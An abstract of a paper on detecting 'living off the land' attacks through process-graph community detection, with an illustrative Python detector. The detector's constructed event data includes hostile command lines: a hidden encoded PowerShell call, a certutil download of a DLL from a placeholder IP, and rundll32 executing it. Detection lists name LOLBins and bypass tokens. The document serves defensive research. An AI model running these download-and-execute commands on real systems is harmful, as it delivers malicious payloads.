Abstract: Hosts in large-scale networks face an increasingly diverse range of security threats. The rapid adoption of machine-learning-based detection of malicious files has greatly improved malware detection and has, in turn, forced adversaries to change their attack strategies. One such strategy, "Living off the land", carries out malicious actions by abusing tools that are already present in the operating system and legitimate automation or administration programs; because these binaries are themselves legitimate, file-based detection does not flag them. Suspicious behaviour of this kind is therefore better recognised in the context of parent and child processes. The proposed method treats the parent-child process chain, together with the related events derived from it, as an undirected graph; the supervised XGBoost algorithm assigns a weight to each edge, producing an undirected weighted graph. Finally, a community detection (community discovery) algorithm is applied to the weighted graph to identify larger attack sequences. The approach is validated on a simulated attack dataset based on MITRE ATT&CK.
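The pipeline described in the abstract, shown end to end on a constructed process tree. This is an added illustration, not the paper's code or dataset: the process-creation events are made up, and a small hand-written LOLBin heuristic (`score_edge`) stands in for the trained XGBoost model as the source of edge weights. The community detection step is weighted label propagation, one common community-discovery algorithm; the paper does not say which one it uses. Communities are then ranked by the total weight of their internal edges, so the attack sequence (Word spawning an encoded PowerShell that runs certutil and rundll32) surfaces at the top while a user opening cmd.exe from Explorer does not.

```python
"""Process-tree community detection, constructed example (not the paper's code).

Steps: (1) constructed parent/child process-creation events, (2) undirected graph
of process instances, (3) per-edge weight from a heuristic that STANDS IN for the
trained XGBoost model, (4) weighted label propagation and ranking of communities.
"""
from collections import defaultdict

# Constructed events: (parent_pid, parent_image, pid, image, command_line).
# 203.0.113.5 is a documentation address; the encoded command is truncated filler.
EVENTS = [
    (1, "services.exe", 2, "svchost.exe", "svchost.exe -k netsvcs"),
    (2, "svchost.exe", 3, "taskhostw.exe", "taskhostw.exe"),
    (4, "explorer.exe", 5, "chrome.exe", "chrome.exe"),
    (5, "chrome.exe", 6, "chrome.exe", "chrome.exe --type=renderer"),
    (4, "explorer.exe", 7, "outlook.exe", "outlook.exe"),
    (7, "outlook.exe", 8, "winword.exe", "winword.exe /n invoice.docm"),
    (8, "winword.exe", 9, "powershell.exe", "powershell -nop -w hidden -enc SQBFAFgAIAAo..."),
    (9, "powershell.exe", 10, "certutil.exe",
     "certutil -urlcache -split -f http://203.0.113.5/a.dll C:\\Users\\Public\\a.dll"),
    (9, "powershell.exe", 11, "rundll32.exe", "rundll32.exe C:\\Users\\Public\\a.dll,DllMain"),
    (4, "explorer.exe", 12, "cmd.exe", "cmd.exe"),
    (12, "cmd.exe", 13, "ipconfig.exe", "ipconfig /all"),
]

# Feature lists for the stand-in scorer (assumed, illustrative; not from the paper).
LOLBINS = {"powershell.exe", "cmd.exe", "certutil.exe", "mshta.exe",
           "rundll32.exe", "wmic.exe", "regsvr32.exe", "bitsadmin.exe"}
UNUSUAL_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "powershell.exe",
                   "wscript.exe", "cscript.exe", "mshta.exe"}
SUSPICIOUS_TOKENS = ("-enc", "-encodedcommand", "urlcache", "http://", "https://",
                     "downloadstring", "iex ", "bypass")


def score_edge(parent_image, child_image, cmdline):
    """Edge weight in [0, 1]: stand-in for the XGBoost score of one parent-child event."""
    s = 0.05                                        # base rate for any process creation
    if child_image.lower() in LOLBINS:
        s += 0.35                                   # child is a living-off-the-land binary
    if parent_image.lower() in UNUSUAL_PARENTS:
        s += 0.30                                   # spawned by an Office app or script host
    if any(t in cmdline.lower() for t in SUSPICIOUS_TOKENS):
        s += 0.20                                   # encoded/download/bypass arguments
    return round(min(s, 1.0), 2)


def build_graph(events):
    """Undirected weighted graph: nodes are (pid, image); each event becomes one edge."""
    graph = defaultdict(dict)
    for ppid, pimg, pid, img, cmd in events:
        parent, child = (ppid, pimg), (pid, img)
        w = score_edge(pimg, img, cmd)
        graph[parent][child] = w
        graph[child][parent] = w
    return dict(graph)


def label_propagation(graph, max_iter=100):
    """Weighted asynchronous label propagation. Every node adopts the label whose
    neighbours carry the most total edge weight; ties go to the lowest (pid, image)
    label so the result is deterministic. Returns a list of node sets."""
    labels = {n: n for n in graph}
    for _ in range(max_iter):
        changed = False
        for node in sorted(graph):
            votes = defaultdict(float)
            for nb, w in graph[node].items():
                votes[labels[nb]] += w
            best = max(sorted(votes), key=votes.__getitem__)  # first max = smallest label
            if best != labels[node]:
                labels[node] = best
                changed = True
        if not changed:
            break
    communities = defaultdict(set)
    for node, lab in labels.items():
        communities[lab].add(node)
    return [frozenset(c) for c in communities.values()]


def rank_communities(graph, communities):
    """Score each community by the summed weight of its internal edges (each once)."""
    scored = []
    for comm in communities:
        total = sum(w for a in comm for b, w in graph[a].items() if b in comm and a < b)
        scored.append((round(total, 2), comm))
    return sorted(scored, key=lambda t: t[0], reverse=True)


def top_attack_sequence(events=EVENTS):
    """Run the whole pipeline and return (score, community) of the heaviest community."""
    graph = build_graph(events)
    return rank_communities(graph, label_propagation(graph))[0]


if __name__ == "__main__":
    g = build_graph(EVENTS)
    for total, comm in rank_communities(g, label_propagation(g)):
        print(f"{total:5.2f}  " + ", ".join(f"{pid}:{img}" for pid, img in sorted(comm)))
```

Two caveats a practitioner would check before trusting a result like this: the stand-in scorer is only as good as its hand-picked features, which is exactly what the paper replaces with a trained XGBoost model, and label propagation's tie-breaking can pull a low-weight neighbour (here the Outlook process) into the attack community, so the ranked communities are a triage aid, not a verdict.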